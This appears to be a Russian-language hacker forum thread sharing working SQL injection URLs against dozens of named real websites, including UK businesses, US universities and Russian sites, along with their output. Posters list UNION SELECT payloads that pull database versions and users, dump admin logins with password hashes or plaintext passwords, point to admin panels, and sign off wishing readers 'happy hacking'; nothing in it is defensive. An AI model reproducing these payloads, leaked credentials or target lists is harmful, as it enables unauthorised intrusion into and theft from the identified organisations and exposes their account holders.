www.ateme.com 4.1.11-Debian_4sarge7-log: atemeweb@localhost: atemeweb Опять не подобрал поля. Таблицы admin нету
http://www.creditman.biz/ The UK's Leading Resource for Businesses and Credit Professionals Админ этого сайта параноик, мало того, что он насоздавал с десяток фейковых таблиц содержащих название admin, колонки с логинами и паролями и т.д. Его логин и пароль состоят из 64 символов каждый!!! Хотя с другой стороны с финансами связано... Вывожу по отдельности, так как вместе не помещается при выводе: Логин: $uC&b+bAz&!#+e@6*cR5yaHec-utr?th7kustuz&ZuDrusp6mAweswAcre7Wu3Ab Code: http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+username+from+Administration)-- Пароль: #r@kep*uX_th*b2xutRa52rey-paruna$ukeG5*Hep-phe9aj#swapeth7Phachu Code: http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+password+from+Administration)-- Админка: https://www.creditman.biz/uk/admin/default.asp Удачного взлома=)
http://www.education.ex.ac.uk/dll/pages.php?id=-242+union+select+1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12/* [email protected]:sell:4.1.20-log а дальше непохек =\
http://www.sopka.net/?pg=1&id=106106&owner=-1+union+select+concat_ws(0x2F,version(),database(),user())/* 4.0.27-max-log/tiba102/[email protected] ----------------------------------------------------------------------------- http://www.probilliard.info/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11/* 4.0.27-log/vh04971/[email protected] ----------------------------------------------------------------------------- http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,version(),database(),user())/* 5.0.45-log/u33748/[email protected] http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,login,password)+from+u33748_otelrent.b_users+limit+0,1/* логин/хеш в title root/be601c6844923ee53211c35603ff0b52
www.firstfordrivers.co.uk 5.0.24-standard-log:firstfordrivers_co_uk:first4drivers@localhost sherry:586e56fa6ed25d6392861a85bccb45e6f64f8e86:10 Лимитом выводим остальных.
http://www.lunarenergy.co.uk/ Code: http://www.lunarenergy.co.uk/newsDetail.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,convert(username+using+latin1),convert(password+using+latin1)),7+from+admin/* scadesign:scadoo http://www.warrenpointharbour.co.uk/ Code: http://www.warrenpointharbour.co.uk/general.php?id=-1+union+select+1,2,3,4,convert(version() +using+latin1),6,7,8,9,10,11/* http://www.graysofwestminster.co.uk/ Code: http://www.graysofwestminster.co.uk/newsitem.php?id=-1+union+select+1,convert(version()+usi ng+latin1),3,4,5,6/* http://www.newrowfarmnurseries.co.uk/ Code: http://www.newrowfarmnurseries.co.uk/show_item.php?id=-1'+union+select+1,2,concat_ws(0x3 a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* http://www.inova.unicamp.br/ Code: http://www.inova.unicamp.br/inovanosmunicipios/artigos_detail.php?id=-1+union+select+1,conca t_ws(0x3a,user(),version(),database()),3,4,5,6/*
Какая то непонятная украинская CMS`ка FreshKnowledge сайт CMS`ки:_http://www.freshknowledge.net/ сайт разработчика:_http://www.setlab.net/ уязвим форум, наверное там полно скулей, но копаться не стал, т.к. интереса особого не представляет Code: http://www.setlab.net/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/* еще примеры: Code: http://www.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/* Code: http://youth.livinggod.org.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/* Code: http://streetball.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*
edu Вот опять по edu прошолся, прошу любить и жаловать: www.gatech.edu Georgia Institute of Technology Code: http://www.gatech.edu/calendar/event.php?id=-2210%20UNION%20SELECT%201,2,3,4,5,VERSION(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* 5.0.37 www.history.msu.edu Department of History - Michigan State University Code: http://www.history.msu.edu/view_profile.php?id=-93%20UNION%20SELECT%201,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),0x20),0x20),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/* 4.1.11-Debian_4sarge7-log : [email protected] : dpthistory2 www.montana.edu Montana State University Code: http://www.montana.edu/cpa/news/nwview.php?article=-5458%20UNION%20SELECT%201,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* 4.0.17
вот еще одна едушка: Code: http://idl63.ils.unc.edu/chirag/Health/showmetadata.php?video_id=-1+union+select+1,2,3,4,5,6,7,8,9,database(),user(),12,version(),14,15,16,17,18,19,20/*
Code: http://travel-tourthailand.com/hotel_detail.php?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+member/* Code: http://www.adventureincostarica.com/zones.php?ID=-1+union+select+1,VERSION(),3/*
http://www.pyramid.spb.ru/content/news/default.asp?shmode=2&ids=1&ida=-1+or+1=@@version Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2) -------------------------------------------------------------------------- http://www.rus7.org/index.php?p=news&newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,version(),database(),user())/* 4.0.27-max-log/utsport1_db01/[email protected] -------------------------------------------------------------------------- http://www.combi-spb.ru/?module=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5/* 4.0.26/u63709/[email protected] -------------------------------------------------------------------------- echoperm.ru http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/*&part_id=2&class=news 4.1.20-log/echotest/echotest@localhost http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_password,user_email),4,5,6+from+phpbb_users/*&part_id=2&class=news логин/хеш/мейл сразу все admin/f609688322a2811966aeb9aca67e2557/[email protected]
Code: http://www.silbersaiten.de/show_item.php?id=-111+union+select+1,2,concat(id,0x3a,name),4,5,6,7,8,9+from+content/* Code: http://www.visitloudoncounty.com/show_item.php?id=-26+union+select+1,2/* Code: http://www.gregsequipment.com/show_item.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES/* Code: https://www.happyvalleyamishtraders.com/store/show_item.php?id=-116+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14/* Code: http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+mob_users/*
Code: http://itsoft.ru/search/?search_query='&in_cat=' Code: http://cs-server.ru/news/detail/?item_id='
Code: http://mathinfo.montclair.edu/undergrad_research/profile.php?id=-48+union+select+1,concat(user(),0x3a,version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* mathweb@localhost:4.0.18-standard-logmath
Code: http://[B]www.gangrule.com[/B]/gangs.php?ID=-1+union+select+user()/* oldtapes_gangrul@localhost 4.1.22-standard-log oldtapes_gangrulecom Code: http://[B]www.fikb.it[/B]/news.asp?id=-1' Errore SQL Errore di run-time di Microsoft VBScript error '800a01a8' Necessario oggetto: 'DBRecordSet(...)' Code: http://www.scamshield.com/Feature.asp?id=-1' Code: http://[B]www.anchem.ru[/B]/catalog/dirCat.asp?id=-1' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_ID = -1'''. /catalog/dirCat.asp, line 15 Code: http://[B]www.r66-rabota.ru[/B]/post.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/* Code: http://www.socket2000.com/index.asp?id=-1' Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'category=-1' and active=true order by xdate desc'. /includes/include_functions.asp, line 10 Code: http://www.scamshield.com/Feature.asp?id=-1' Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'ArticleNumber = -1''. /Feature.asp, line 21
Code: http://ecodefense.ru/view.php?id=-503+union+select+1,2,3,4,5,6,7,8,9,VERSION(),11/* Code: http://www.hoglezoo.org/animals/view.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/*
Code: http://[B]www.vikinggames.hu[/B]/product.php?id=-1+union+select+1,table_name,version(),4,user(),6,7+from+information_schema.tables/* 5.0.32-Debian_7etch1-log viking1@localhost